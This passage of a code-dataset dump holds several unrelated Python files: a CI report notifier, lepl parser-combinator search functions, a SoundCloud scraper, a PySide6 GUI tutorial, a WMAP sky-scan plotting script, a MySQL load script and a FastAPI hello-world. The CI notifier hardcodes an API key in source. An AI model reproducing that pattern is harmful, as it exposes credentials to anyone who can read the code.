"env.FILE_ALL_PROCESS_PID_WAITING", "line_number": 84, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 85, "usage_type": "call"}, {"api_name": "tools.readFromFile", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path", "line_number": 93, "usage_type": "attribute"}, {"api_name": "env.PATH_TO_PROCESS_EXE", "line_number": 94, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path", "line_number": 95, "usage_type": 
"attribute"}, {"api_name": "env.PROCESS_EXE", "line_number": 96, "usage_type": "name"}, {"api_name": "tools.writeInJsonFile", "line_number": 102, "usage_type": "call"}]} +{"seq_id": "11319666847", "text": "import os, sys\nimport requests\nsys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))\n\n\ndef send_report_link():\n CI_JOB_ID = sys.argv[1]\n EXIT_CODE = int(sys.argv[2])\n status = 'SUCCESS'\n if EXIT_CODE != 0:\n status = 'FAILED'\n\n repo_name = 'messenger_tests_web'\n\n job = f'https://gitlab.com/messenger_team/{repo_name}/-/jobs/{CI_JOB_ID}'\n report = f'https://messenger_team.gitlab.io/-/{repo_name}/-/jobs/{CI_JOB_ID}/artifacts/report/report.html'\n msg = f'`GUI web tests` CI_JOB_ID={CI_JOB_ID} - *{status}* \\n Перейти к джобе: {job} \\n Смотреть отчет: {report}'\n key = 'JEkKqCP1IQLzkAn'\n\n requests.post('https://hostname/api/message', data={\n 'key': key,\n 'message': f'{msg}',\n 'important': 'false',\n 'nopreview': 'true'\n\n })\n\nif __name__ == \"__main__\":\n send_report_link()", "repo_name": "arkuz/messenger_tests_web", "sub_path": "scripts/send_tests_report.py", "file_name": "send_tests_report.py", "file_ext": "py", "file_size_in_byte": 892, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.path.append", "line_number": 3, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 3, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 3, "usage_type": "call"}, {"api_name": "os.path", "line_number": 3, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 3, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 7, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 8, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "2558535844", "text": "\nfrom abc import ABCMeta\nfrom collections import deque\n\nfrom lepl.matchers.core import Literal\nfrom lepl.matchers.matcher import add_children\nfrom lepl.matchers.support import coerce_, sequence_matcher_factory, \\\n trampoline_matcher_factory, to\nfrom lepl.matchers.transform import Transformable\nfrom lepl.support.lib import lmap, format, document\n\n\n# pylint: disable-msg=C0103, W0105\n# Python 2.6\n#class BaseSearch(metaclass=ABCMeta):\n_BaseSearch = ABCMeta('_BaseSearch', (object, ), {})\n'''\nABC used to identify matchers. 
\n\nNote that graph traversal assumes subclasses are hashable and iterable.\n'''\n\nclass BaseSearch(_BaseSearch):\n pass\n\n\ndef _cleanup(queue):\n '''\n Utility to discard queued/stacked values.\n '''\n for (_count, _acc, _stream, generator) in queue:\n generator.generator.close()\n \n\ndef search_factory(factory):\n '''\n Add the arg processing common to all searching.\n '''\n def new_factory(first, start, stop, rest=None):\n rest = first if rest is None else rest\n return factory(first, start, stop, rest)\n return document(new_factory, factory)\n\n\n@trampoline_matcher_factory(False)\n@search_factory\ndef DepthFirst(first, start, stop, rest):\n '''\n (Post order) Depth first repetition (typically used via `Repeat`).\n '''\n def match(support, stream):\n stack = deque()\n try:\n stack.append((0, [], stream, first._match(stream)))\n while stack:\n (count1, acc1, stream1, generator) = stack[-1]\n extended = False\n if stop is None or count1 < stop:\n count2 = count1 + 1\n try:\n (value, stream2) = yield generator\n acc2 = acc1 + value\n stack.append((count2, acc2, stream2, \n rest._match(stream2)))\n extended = True\n except StopIteration:\n pass\n if not extended:\n if count1 >= start and (stop is None or count1 <= stop):\n yield (acc1, stream1)\n stack.pop()\n finally:\n _cleanup(stack)\n \n return match\n\n\n@trampoline_matcher_factory(False)\n@search_factory\ndef BreadthFirst(first, start, stop, rest):\n '''\n (Level order) Breadth first repetition (typically used via `Repeat`).\n '''\n def match(support, stream):\n queue = deque()\n try:\n queue.append((0, [], stream, first._match(stream)))\n while queue:\n (count1, acc1, stream1, generator) = queue.popleft()\n if count1 >= start and (stop is None or count1 <= stop):\n yield (acc1, stream1)\n count2 = count1 + 1\n try:\n while True:\n (value, stream2) = yield generator\n acc2 = acc1 + value\n if stop is None or count2 <= stop:\n queue.append((count2, acc2, stream2, \n rest._match(stream2)))\n except StopIteration:\n pass\n finally:\n _cleanup(queue)\n \n return match\n\n\n@trampoline_matcher_factory(False, matcher=to(Literal))\ndef OrderByResultCount(matcher, ascending=True):\n '''\n Modify a matcher to return results in length order.\n '''\n\n def match(support, stream):\n '''\n Attempt to match the stream.\n '''\n generator = matcher._match(stream)\n results = []\n try:\n while True:\n # syntax error if this on one line?!\n result = yield generator\n results.append(result)\n except StopIteration:\n pass\n for result in sorted(results,\n key=lambda x: len(x[0]), reverse=ascending):\n yield result\n \n return match\n \n\n@sequence_matcher_factory()\n@search_factory\ndef DepthNoTrampoline(first, start, stop, rest):\n '''\n A more efficient search when all matchers are functions (so no need to\n trampoline). 
Depth first (greedy).\n '''\n def matcher(support, stream):\n stack = deque()\n try:\n stack.append((0, [], stream, first._untagged_match(stream)))\n while stack:\n (count1, acc1, stream1, generator) = stack[-1]\n extended = False\n if stop is None or count1 < stop:\n count2 = count1 + 1\n try:\n (value, stream2) = next(generator)\n acc2 = acc1 + value\n stack.append((count2, acc2, stream2, \n rest._untagged_match(stream2)))\n extended = True\n except StopIteration:\n pass\n if not extended:\n if count1 >= start and (stop is None or count1 <= stop):\n yield (acc1, stream1)\n stack.pop()\n finally:\n for (_count, _acc, _stream, generator) in stack:\n generator.close()\n \n return matcher\n \n \n@sequence_matcher_factory()\n@search_factory\ndef BreadthNoTrampoline(first, start, stop, rest):\n '''\n A more efficient search when all matchers are functions (so no need to\n trampoline). Breadth first (non-greedy).\n '''\n def matcher(support, stream):\n queue = deque()\n try:\n queue.append((0, [], stream, first._untagged_match(stream)))\n while queue:\n (count1, acc1, stream1, generator) = queue.popleft()\n if count1 >= start and (stop is None or count1 <= stop):\n yield (acc1, stream1)\n count2 = count1 + 1\n for (value, stream2) in generator:\n acc2 = acc1 + value\n if stop is None or count2 <= stop:\n queue.append((count2, acc2, stream2, \n rest._untagged_match(stream2)))\n finally:\n for (_count, _acc, _stream, generator) in queue:\n generator.close()\n \n return matcher\n\n\nadd_children(BaseSearch, DepthFirst, BreadthFirst, \\\n DepthNoTrampoline, BreadthNoTrampoline)\n\n \nclass _BaseCombiner(Transformable):\n '''\n Support for `And` and `Or`.\n '''\n \n def __init__(self, *matchers):\n super(_BaseCombiner, self).__init__()\n self._args(matchers=lmap(coerce_, matchers))\n \n def compose(self, wrapper):\n '''\n Generate a new instance with the composed function from the Transform.\n '''\n copy = type(self)(*self.matchers)\n copy.wrapper = self.wrapper.compose(wrapper)\n return copy\n \n\n@trampoline_matcher_factory(True, args_=to(Literal))\ndef And(*matchers):\n '''\n Match one or more matchers in sequence (**&**).\n It can be used indirectly by placing ``&`` between matchers.\n '''\n# matchers = lmap(coerce_, matchers)\n \n def match(support, stream_in):\n if matchers:\n stack = deque([([], \n matchers[0]._match(stream_in), \n matchers[1:])])\n append = stack.append\n pop = stack.pop\n try:\n while stack:\n (result, generator, queued) = pop()\n try:\n (value, stream_out) = yield generator\n append((result, generator, queued))\n if queued:\n append((result+value, \n queued[0]._match(stream_out), \n queued[1:]))\n else:\n yield (result+value, stream_out)\n except StopIteration:\n pass\n finally:\n for (result, generator, queued) in stack:\n generator.generator.close()\n \n return match\n\n\n@sequence_matcher_factory(args_=to(Literal))\ndef AndNoTrampoline(*matchers):\n '''\n Used as an optimisation when sub-matchers do not require the trampoline.\n '''\n def matcher(support, stream_in):\n if matchers:\n stack = deque([([], matchers[0]._untagged_match(stream_in), matchers[1:])])\n append = stack.append\n pop = stack.pop\n try:\n while stack:\n (result, generator, queued) = pop()\n try:\n (value, stream_out) = next(generator)\n append((result, generator, queued))\n if queued:\n append((result+value, \n queued[0]._untagged_match(stream_out), \n queued[1:]))\n else:\n yield (result+value, stream_out)\n except StopIteration:\n pass\n finally:\n for (result, generator, queued) in stack:\n 
generator.close()\n \n return matcher\n \n \n@trampoline_matcher_factory(True, args_=to(Literal))\ndef Or(*matchers):\n '''\n Match one of the given matchers (**|**).\n It can be used indirectly by placing ``|`` between matchers.\n \n Matchers are tried from left to right until one succeeds; backtracking\n will try more from the same matcher and, once that is exhausted,\n continue to the right. String arguments will be coerced to \n literal matches.\n '''\n# matchers = lmap(coerce_, matchers)\n \n def match(support, stream_in):\n '''\n Do the matching (return a generator that provides successive \n (result, stream) tuples). The result will correspond to one of the\n sub-matchers (starting from the left).\n '''\n for matcher in matchers:\n generator = matcher._match(stream_in)\n try:\n while True:\n yield (yield generator)\n except StopIteration:\n pass\n \n return match\n\n\n@sequence_matcher_factory(args_=to(Literal))\ndef OrNoTrampoline(*matchers):\n '''\n Used as an optimisation when sub-matchers do not require the trampoline.\n '''\n def match(support, stream_in):\n '''\n Do the matching (return a generator that provides successive \n (result, stream) tuples). The result will correspond to one of the\n sub-matchers (starting from the left).\n '''\n for matcher in matchers:\n for result in matcher._untagged_match(stream_in):\n yield result\n return match\n\n \n@trampoline_matcher_factory(True)\ndef First(*matchers):\n '''\n Match the first successful matcher only (**%**).\n It can be used indirectly by placing ``%`` between matchers.\n Note that backtracking for the first-selected matcher will still occur.\n\n Matchers are tried from left to right until one succeeds; backtracking\n will try more from the same matcher (only). String arguments will be \n coerced to literal matches.\n '''\n def match(self, stream):\n matched = False\n for matcher in self.matchers:\n generator = matcher._match(stream)\n try:\n while True:\n yield (yield generator)\n matched = True\n except StopIteration:\n pass\n if matched:\n break\n\n return match\n\n\n", "repo_name": "willtang/lyx2ebook", "sub_path": "src/lepl/matchers/combine.py", "file_name": "combine.py", "file_ext": "py", "file_size_in_byte": 11869, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "61", "api": [{"api_name": "abc.ABCMeta", "line_number": 16, "usage_type": "call"}, {"api_name": "lepl.support.lib.document", "line_number": 42, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 52, "usage_type": "call"}, {"api_name": "lepl.matchers.support.trampoline_matcher_factory", "line_number": 45, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 85, "usage_type": "call"}, {"api_name": "lepl.matchers.support.trampoline_matcher_factory", "line_number": 78, "usage_type": "call"}, {"api_name": "lepl.matchers.support.trampoline_matcher_factory", "line_number": 108, "usage_type": "call"}, {"api_name": "lepl.matchers.support.to", "line_number": 108, "usage_type": "call"}, {"api_name": "lepl.matchers.core.Literal", "line_number": 108, "usage_type": "argument"}, {"api_name": "collections.deque", "line_number": 142, "usage_type": "call"}, {"api_name": "lepl.matchers.support.sequence_matcher_factory", "line_number": 134, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 177, "usage_type": "call"}, {"api_name": "lepl.matchers.support.sequence_matcher_factory", "line_number": 169, "usage_type": "call"}, {"api_name": 
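# A simplified standalone model (not lepl's actual matcher protocol) of the
# deque-as-stack search in DepthFirst/DepthNoTrampoline above: each stack
# frame holds (count, accumulated, stream, generator); while a generator still
# yields, the search deepens greedily, and exhausted frames emit their
# accumulated result post-order before being popped.
from collections import deque

def depth_first_repeat(match_once, stream, start, stop):
    stack = deque([(0, [], stream, match_once(stream))])
    while stack:
        count, acc, rest, gen = stack[-1]
        extended = False
        if stop is None or count < stop:
            try:
                value, rest2 = next(gen)
                stack.append((count + 1, acc + [value], rest2, match_once(rest2)))
                extended = True
            except StopIteration:
                pass
        if not extended:
            if count >= start and (stop is None or count <= stop):
                yield acc, rest
            stack.pop()

# match_once consumes one leading 'a'; hypothetical toy matcher for the demo.
one_a = lambda s: iter([("a", s[1:])] if s[:1] == "a" else [])
print(list(depth_first_repeat(one_a, "aab", 1, None)))  # greedy match first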
"lepl.matchers.matcher.add_children", "line_number": 197, "usage_type": "call"}, {"api_name": "lepl.matchers.transform.Transformable", "line_number": 201, "usage_type": "name"}, {"api_name": "lepl.support.lib.lmap", "line_number": 208, "usage_type": "call"}, {"api_name": "lepl.matchers.support.coerce_", "line_number": 208, "usage_type": "argument"}, {"api_name": "collections.deque", "line_number": 229, "usage_type": "call"}, {"api_name": "lepl.matchers.support.trampoline_matcher_factory", "line_number": 219, "usage_type": "call"}, {"api_name": "lepl.matchers.support.to", "line_number": 219, "usage_type": "call"}, {"api_name": "lepl.matchers.core.Literal", "line_number": 219, "usage_type": "argument"}, {"api_name": "collections.deque", "line_number": 262, "usage_type": "call"}, {"api_name": "lepl.matchers.support.sequence_matcher_factory", "line_number": 255, "usage_type": "call"}, {"api_name": "lepl.matchers.support.to", "line_number": 255, "usage_type": "call"}, {"api_name": "lepl.matchers.core.Literal", "line_number": 255, "usage_type": "argument"}, {"api_name": "lepl.matchers.support.trampoline_matcher_factory", "line_number": 286, "usage_type": "call"}, {"api_name": "lepl.matchers.support.to", "line_number": 286, "usage_type": "call"}, {"api_name": "lepl.matchers.core.Literal", "line_number": 286, "usage_type": "argument"}, {"api_name": "lepl.matchers.support.sequence_matcher_factory", "line_number": 316, "usage_type": "call"}, {"api_name": "lepl.matchers.support.to", "line_number": 316, "usage_type": "call"}, {"api_name": "lepl.matchers.core.Literal", "line_number": 316, "usage_type": "argument"}, {"api_name": "lepl.matchers.support.trampoline_matcher_factory", "line_number": 333, "usage_type": "call"}]} +{"seq_id": "33696749273", "text": "# A web crawler project to gather information from https://soundcloud.com/\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef music_spider(band_list):\n try:\n print('Fetching data from Soundcloud...\\n')\n for band in band_list:\n url = 'https://soundcloud.com/search?q=' + band\n source_code = requests.get(url)\n plain_text = source_code.text\n soup = BeautifulSoup(plain_text, \"lxml\")\n for link in soup.find_all(\"ul\"):\n for item in link.find_all(\"h2\"):\n # print(item.next_element.next_element)\n print(item.string)\n except Exception as e:\n print(\"Oops! 
Connection not established: \", e)\n\n\nmusic_spider(['iron maiden', 'metallica', 'megadeth', 'kreator'])\n", "repo_name": "abhijitroynits/python_practice_101", "sub_path": "Tutorials7-56/25_webCrawler.py", "file_name": "25_webCrawler.py", "file_ext": "py", "file_size_in_byte": 787, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.get", "line_number": 12, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "23255557308", "text": "\"\"\"from PySide6.QtWidgets import QApplication,QPushButton,QWidget,QVBoxLayout,QMainWindow\n\napp = QApplication()\n\nbotao = QPushButton(\"texto botao\") # faz botao\nbotao.setStyleSheet('font-size: 80px') # faz o estilizacao do botao\nbotao.show()# exibi a janela\n\ncentral_widget = QWidget() # central para adicionar no layout\nlayout = QVBoxLayout()\nlayout.addWidget(botao)\n\n\nwindow = QMainWindow()\nwindow.setWindowTitle('primeiro projeto') # altera o nome da janela\n\ndef slot_example(status_bar):\n status_bar.showMessage('o meu sloat foi executado')\n\n# barra no fundo da aplicacao\nstatus_bar = window.statusBar() # faz a barra no fundo da aplicacao\nstatus_bar.showMessage('mostra mensagem na barra') # exbi mensagem na barra da aplicacao\n\n# menuBar\nmenu = window.menuBar() # cria uma menu na parte susperior\nprimeiro_menu = menu.addMenu('primeiro menu') # vai adicionar um meno na tela na parte superior\nprimeira_acao = primeiro_menu.addAction('primeira acao') # adicionando uma acao ao menu e printando\n# sempre tem que passar algum parametro\nprimeira_acao.triggered.connect(lambda: slot_example(status_bar)) # aqui faz uma lamba para adicar a excucao e retorna uma boolean\n\n\ncentral_widget.show() # aparecer na tela\napp.exec() # o loop da aplicacao\n\"\"\"\n# O básico sobre Signal e Slots (eventos e documentação)\nimport sys\nfrom typing import Optional\n\nfrom PySide6.QtCore import Slot\nfrom PySide6.QtWidgets import (QApplication, QGridLayout, QMainWindow,\n QPushButton, QWidget)\n\nclass MyWindow(QMainWindow):\n def __init__(self,parent = None):\n super().__init__(parent)\n self.central_widget = QWidget()\n self.setCentralWidget(self.central_widget)\n self.setWindowTitle('Minha janela bonita')\n\n self.botao1 = QPushButton('Texto do botão') # cria botoes\n self.botao1.setStyleSheet('font-size: 80px;') # modifica o tamanho da fonte\n self.botao1.clicked.connect(self.outro_slot) # type:ignore\n\n self.botao2 = QPushButton('Botão 2') # cria botoes\n self.botao2.setStyleSheet('font-size: 40px;') # modifica o tamanho da fonte\n\n self.botao3 = QPushButton('Botão 3') # cria botoes\n self.botao3.setStyleSheet('font-size: 40px;') # modifica o tamonha da fonte\n\n self.grid_layout = QGridLayout() # cfia um grid como layout\n self.central_widget.setLayout(self.grid_layout)\n\n self.grid_layout.addWidget(self.botao1, 1, 1, 1, 1)\n self.grid_layout.addWidget(self.botao2, 1, 2, 1, 1)\n self.grid_layout.addWidget(self.botao3, 3, 1, 1, 2)\n\n # statusBar\n self.status_bar = self.statusBar()\n self.status_bar.showMessage('Mostrar mensagem na barra')\n\n # menuBar\n self.menu = self.menuBar()\n self.primeiro_menu = self.menu.addMenu('Primeiro menu')\n self.primeira_acao = self.primeiro_menu.addAction('Primeira ação')\n self.primeira_acao.triggered.connect(self.slot_example) # type:ignore\n\n self.segunda_action = self.primeiro_menu.addAction('Segunda ação')\n self.segunda_action.setCheckable(True)\n 
self.segunda_action.toggled.connect(self.outro_slot) # type:ignore\n self.segunda_action.hovered.connect(self.outro_slot) # type:ignore\n\n @Slot()\n def slot_example(self,status_bar):\n def inner():\n status_bar.showMessage('O meu slot foi executado')\n return inner\n\n\n @Slot()\n def outro_slot(self):\n print('Está marcado?', self.segunda_action.isChecked())\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n window = MyWindow()\n window.show()\n app.exec() # O loop da aplicação\n\n", "repo_name": "otavio-schmieleski/Python", "sub_path": "Interface_Grafica/comando.py", "file_name": "comando.py", "file_ext": "py", "file_size_in_byte": 3653, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "PySide6.QtWidgets.QMainWindow", "line_number": 43, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QWidget", "line_number": 46, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QPushButton", "line_number": 50, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QPushButton", "line_number": 54, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QPushButton", "line_number": 57, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QGridLayout", "line_number": 60, "usage_type": "call"}, {"api_name": "PySide6.QtCore.Slot", "line_number": 82, "usage_type": "call"}, {"api_name": "PySide6.QtCore.Slot", "line_number": 89, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QApplication", "line_number": 94, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 94, "usage_type": "attribute"}]} +{"seq_id": "18743921589", "text": "import matplotlib.pyplot as plt\nimport numpy as np\nimport healpy as hp\nimport huffman\nimport h5py\n\n\nfrom glob import glob\n\nversion = 24\nband = \"K1\"\n\nfnames = glob(f\"/mn/stornext/d16/cmbco/bp/wmap/data/wmap_{band}_*v{version}.h5\")\nfnames.sort()\nfname = fnames[0]\nfname = \"/mn/stornext/d16/cmbco/bp/wmap/data/wmap_K1_001588_v24.h5\"\n\nlabels = [f\"{band}13\", f\"{band}14\", f\"{band}23\", f\"{band}24\"]\nf = h5py.File(fname, \"r\")\nobsid = str(list(f.keys())[0])\nobsid = \"038101\"\nhuffTree = f[obsid + \"/common/hufftree\"]\nhuffSymb = f[obsid + \"/common/huffsymb\"]\nh = huffman.Huffman(tree=huffTree, symb=huffSymb)\n\n\nDAs = [[], [], [], []]\nflags = [[], [], [], []]\nsigmas = []\ngains = np.zeros(len(labels))\nnpsi = 2048\npsiBins = np.linspace(0, 2 * np.pi, npsi)\nfor num, label in enumerate(labels):\n TODs = np.array(f[obsid + \"/\" + label + \"/tod\"])\n scalars = f[obsid + \"/\" + label + \"/scalars\"]\n gains[num] = scalars[0]\n flag = h.Decoder(np.array(f[obsid + \"/\" + label + \"/flag\"]))\n flags[num] = flags[num] + flag.tolist()\n DAs[num] = DAs[num] + TODs.tolist()\n sigmas.append(TODs.std())\n if label == f\"{band}13\":\n pixA = h.Decoder(np.array(f[obsid + \"/\" + label + \"/pixA\"])).astype(\"int\")\n pixB = h.Decoder(np.array(f[obsid + \"/\" + label + \"/pixB\"])).astype(\"int\")\n\n\nnside = 512\nthetaA, phiA = hp.pix2ang(nside, pixA)\nthetaB, phiB = hp.pix2ang(nside, pixB)\n# loop over:\nfor i in range(7):\n hp.mollview(hp.UNSEEN * np.ones(12), cbar=False, title=\"\", sub=(3, 3, i + 1))\n ax = plt.gca()\n ax.projscatter(\n thetaA[4000 * i : 4000 * (i + 1)],\n phiA[4000 * i : 4000 * (i + 1)],\n color=\"r\",\n s=0.1,\n )\n ax.projscatter(\n thetaB[4000 * i : 4000 * (i + 1)],\n phiB[4000 * i : 4000 * (i + 1)],\n color=\"b\",\n s=0.1,\n )\n plt.title(f\"{4000*i}--{4000*(i+1)}\")\nhp.mollview(hp.UNSEEN * np.ones(12), cbar=False, 
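# An illustrative sketch (hypothetical classes; assumes PySide6 is installed)
# of the Signal/Slot mechanism the window above relies on: a Signal declared
# on a QObject subclass and connected to a @Slot method fires synchronously on
# emit() for a direct, same-thread connection -- no event loop is required.
from PySide6.QtCore import QObject, Signal, Slot

class Counter(QObject):
    changed = Signal(int)

class Printer(QObject):
    @Slot(int)
    def show(self, value):
        print("count is now", value)

counter, printer = Counter(), Printer()
counter.changed.connect(printer.show)
counter.changed.emit(3)  # -> count is now 3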
title=\"\")\nhp.projscatter(thetaA[:4000], phiA[:4000], color=\"r\", s=0.5)\nhp.projscatter(thetaB[:4000], phiB[:4000], color=\"b\", s=0.5)\n\nhp.mollview(hp.UNSEEN * np.ones(12), cbar=False, title=\"\")\nhp.projscatter(thetaA[4000:8000], phiA[4000:8000], color=\"r\", s=0.5)\nhp.projscatter(thetaB[4000:8000], phiB[4000:8000], color=\"b\", s=0.5)\nhp.mollview(hp.UNSEEN * np.ones(12), cbar=False, title=\"\")\nhp.projscatter(thetaA[9000:13000], phiA[9000:13000], color=\"r\", s=0.5)\nhp.projscatter(thetaB[9000:13000], phiB[9000:13000], color=\"b\", s=0.5)\nplt.title(\"Scans 9000--13000\")\nplt.show()\n", "repo_name": "Cosmoglobe/Commander", "sub_path": "commander3/todscripts/wmap/plot_scans.py", "file_name": "plot_scans.py", "file_ext": "py", "file_size_in_byte": 2463, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 15, "dataset": "github-code", "pt": "61", "api": [{"api_name": "glob.glob", "line_number": 13, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 19, "usage_type": "call"}, {"api_name": "huffman.Huffman", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 32, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 43, "usage_type": "call"}, {"api_name": "healpy.pix2ang", "line_number": 47, "usage_type": "call"}, {"api_name": "healpy.pix2ang", "line_number": 48, "usage_type": "call"}, {"api_name": "healpy.mollview", "line_number": 51, "usage_type": "call"}, {"api_name": "healpy.UNSEEN", "line_number": 51, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 65, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 65, "usage_type": "name"}, {"api_name": "healpy.mollview", "line_number": 66, "usage_type": "call"}, {"api_name": "healpy.UNSEEN", "line_number": 66, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 66, "usage_type": "call"}, {"api_name": "healpy.projscatter", "line_number": 67, "usage_type": "call"}, {"api_name": "healpy.projscatter", "line_number": 68, "usage_type": "call"}, {"api_name": "healpy.mollview", "line_number": 70, "usage_type": "call"}, {"api_name": "healpy.UNSEEN", "line_number": 70, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 70, "usage_type": "call"}, {"api_name": "healpy.projscatter", "line_number": 71, "usage_type": "call"}, {"api_name": "healpy.projscatter", "line_number": 72, "usage_type": "call"}, {"api_name": "healpy.mollview", "line_number": 73, "usage_type": "call"}, {"api_name": "healpy.UNSEEN", "line_number": 73, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 73, "usage_type": "call"}, {"api_name": "healpy.projscatter", "line_number": 74, "usage_type": "call"}, {"api_name": "healpy.projscatter", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": 
"name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}]} +{"seq_id": "365814631", "text": "import mysql.connector\nimport time\nimport random\nfrom PIL import Image\nimport numpy as np\n\ndef img2arr(img_path):\n img = Image.open(img_path)\n return np.array(img.convert('L'))\n\nif __name__ == '__main__':\n arr = img2arr('lisa_small.png')\n\n mydb = mysql.connector.connect(\n host='127.0.0.1', \n port=4000, \n user='root')\n mycursor = mydb.cursor()\n mycursor.execute('CREATE DATABASE IF NOT EXISTS yifan_db')\n mydb.commit()\n mycursor.execute('use yifan_db')\n mydb.commit()\n\n num_tables = arr.shape[0]\n num_epochs = arr.shape[1]\n num_records = 100\n max_value = 255.0\n name_prefix = 'may force be with you!!'\n\n print('create tables...')\n for tid in range(num_tables):\n mycursor.execute('CREATE TABLE mytable{} (id INT PRIMARY KEY, name VARCHAR(255))'.format(tid))\n mydb.commit()\n\n print('write to tables...')\n for tid in range(num_tables):\n print('table {}'.format(tid))\n sql = 'INSERT INTO mytable{} (id, name) VALUES (%s, %s)'.format(tid)\n t1 = time.time()\n for rid in range(num_records):\n val = (str(rid), name_prefix + ' rid = {} time = {}'.format(rid, t1))\n mycursor.execute(sql, val)\n mydb.commit()\n t2 = time.time()\n print('insert {} records to mytable{} costs {} s'.format(num_records, tid, t2 - t1))\n\n\n for eid in range(num_epochs):\n t1 = time.time()\n for tid in range(num_tables):\n # num_updates = random.randint(0, num_records - 1)\n num_updates = np.clip(int(arr[num_tables - tid - 1][eid] / max_value * 100.0), 0, 100)\n print('epoch[{}] mytable{} update {} records'.format(eid, tid, num_updates))\n sql = 'UPDATE mytable{} SET name = %s WHERE id = %s'.format(tid)\n for rid in range(num_updates):\n val = (name_prefix + ' rid = {} time = {}'.format(rid, t1), str(rid))\n mycursor.execute(sql, val)\n mydb.commit()\n t2 = time.time()\n print('epoch[{}] takes {} s'.format(eid, t2 - t1))\n sleep_time = 60 - (time.time() - t1)\n if sleep_time > 0:\n time.sleep(sleep_time)\n", "repo_name": "xuyifangreeneyes/hw", "sub_path": "test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 2187, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "PIL.Image.open", "line_number": 8, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 8, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 9, "usage_type": "call"}, {"api_name": "mysql.connector.connector.connect", "line_number": 14, "usage_type": "call"}, {"api_name": "mysql.connector.connector", "line_number": 14, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 14, "usage_type": "name"}, {"api_name": "time.time", "line_number": 39, "usage_type": "call"}, {"api_name": "time.time", "line_number": 44, "usage_type": "call"}, {"api_name": "time.time", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 52, "usage_type": "call"}, {"api_name": "time.time", "line_number": 59, "usage_type": "call"}, {"api_name": "time.time", "line_number": 61, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 63, "usage_type": "call"}]} +{"seq_id": "17178909242", "text": "from fastapi.responses import HTMLResponse\nfrom fastapi import FastAPI\napp = FastAPI()\n@app.get(\"/hello/\")\nasync def hello():\n ret='''\n\n\nHello World!\n\n\n'''\n return 
